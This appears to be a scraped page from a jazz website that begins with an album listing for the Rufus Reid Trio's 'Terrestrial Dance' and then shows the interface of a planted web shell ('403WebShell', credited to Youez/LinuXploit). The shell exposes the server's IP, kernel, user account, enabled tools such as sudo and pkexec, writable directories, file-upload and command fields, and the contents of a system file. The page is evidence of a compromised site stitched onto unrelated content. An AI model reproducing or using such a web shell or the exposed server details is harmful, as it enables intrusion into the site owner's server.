Rufus Reid Trio with Steve Allee and Duduka Da Fonseca, featuring the Sirius Quartet

Terrestrial Dance

Newvelle Records (2017)

Tracklist
  1. This I Ask of You
  2. Its Time to Shout It Out
  3. Tippin’
  4. Tranescape
  5. Celestial Dance
  6. You Make Me Smile
  7. Falling In Love
  8. Cedar’s Blues
403WebShell
403Webshell
Server IP : 23.235.221.107  /  Your IP : 216.73.216.166
Web Server : Apache
System : Linux drums.jazzcorner.com 4.18.0-513.24.1.el8_9.x86_64 #1 SMP Mon Apr 8 11:23:13 EDT 2024 x86_64
User : rreid ( 1011)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /sbin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /sbin/iotop
#!/usr/libexec/platform-python -s
# iotop: Display I/O usage of processes in a top like UI
# Copyright (c) 2007, 2008 Guillaume Chazarain <guichaz@gmail.com>, GPLv2
# See iotop --help for some help

from __future__ import print_function
import sys

try:
    from iotop.ui import main
except ImportError as e:
    print(e)
    print('To run an uninstalled copy of iotop,')
    print('launch iotop.py in the top directory')
else:
    try:
        main()
    except KeyboardInterrupt:
        pass
    sys.exit(0)

Youez - 2016 - github.com/yon3zu
LinuXploit